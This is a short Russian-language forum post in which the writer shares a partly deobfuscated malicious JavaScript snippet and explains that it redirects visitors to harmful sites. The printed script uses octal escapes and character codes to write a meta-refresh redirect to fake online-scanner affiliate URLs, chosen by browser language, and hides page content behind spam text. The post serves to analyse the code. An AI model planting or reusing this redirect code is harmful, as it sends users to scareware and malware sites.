Можете сами оценить
что делает сей скрипт

<script type="text/javascript" language="javascript">
var smnk=new Date( );
smnk.setTime(smnk.getTime( )+014*074*074*01750);
document.cookie="sessionid=349a9f0194; path=/; expires="+smnk.toGMTString( );
var gxwhdd=new Array("http://goparkscan.com/?uid=12800","http://s\143anonlinedirect.com/hitin.php?land=30&affid=18801");
var wemzlao="ca,co,da,de,cy,el,en.eo,es,fi,fr,ga,it,ja,ji,kn,nl,no,pt,sv";
var ntsfayo=navigator.language || navigator.systemLanguage;
var lang=ntsfayo.toLowerCase( ); lang=lang.substr(0,2);
if (wemzlao.indexOf(lang)==-1){ksjhr( ); }else {var vehvfx=Math.floor(Math.random( )*gxwhdd.length); wewx(gxwhdd[vehvfx]); }
function wewx(zxjiiha){document.writeln("\074\115ETA HTTP-EQUIV=\047Refresh\047 CONTENT=\0470; URL="+zxjiiha+"&#39;>");
document.writeln("\074meta http-equiv=\047pragma\047\040content=&#39;no-cache&#39;>");
document.writeln("<meta nam\145=\047robots&#39; content=&#39;noindex,nofollow\047\076"); }
function ksjhr( ){wewx("http://sc\141nonlinedirect.com/hitin.php?land=30&affid=18802"); }
</script>
<script>document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script>
<h1> Harry Potter and the Half-Blood Prince Harry Potter and the Half-Blood Prince</h1>
01bc93bf47db20ce84b77fda9bba756b

Я убрал тот манглинг который он использует

Он подставляет страничку с которой происходит дальше редирект на указанные там в виде ссылок вредоносные сайты